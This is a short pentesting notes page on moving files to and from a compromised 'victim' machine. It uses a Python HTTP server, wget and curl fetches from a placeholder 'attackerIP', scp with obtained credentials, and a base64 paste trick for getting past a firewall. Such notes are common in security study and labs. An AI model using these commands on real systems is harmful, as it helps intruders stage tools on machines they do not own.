Transferring files to/from remote victim

Once we compromised a system we could use different methods to transfer files to/from the victim depending on the situation.

Using wget or cURL

If the compromised victim has privileges enough to download files we could use wget or curl to copy a file from our own machine. First go into the directory that contains the file you want to transfer and run a simple Python HTTP server there with:

cd /transferDirectory
python3 -m http.server 8080         #8080 as an example port, use whatever

Now the server is listening on 8080 in our machine, download the file on the "compromised with code execution" victim with:

wget http://attackerIP:8080/file
or
curl http://attackerIP:8080/file -o newNameFile

Also could be vice-versa with the http server in the victim(if it has python installed) and the attacker downloading via wget/curl.

Using SSH file transfer SCP

Granted we obtained SSH credentials we could use SCP to transfer files from our attacking machine to the victim directly:

scp /local/dir/fileX user@IP:/remote/dir/fileX

Using Base64

If you are not able to transfer files directly, for example because the firewall protection prevents the victim to download files, you could use the base64 trick. Consists on encoding the file in base64 without line breaks (-w 0) so you can copy every detail from the file:

base64 fileX -w 0

And paste the result on the compromised machine with:

echo d2hhdCBhcmUgeW9 ... 1IGxvb2tpbmcgYXQg | base64 -d > fileX

To validate that the file transferred correctly we could check and compare the MD5 hash from the original file to the file pasted in the victim system:

md5sum fileX

Last updated 7 months ago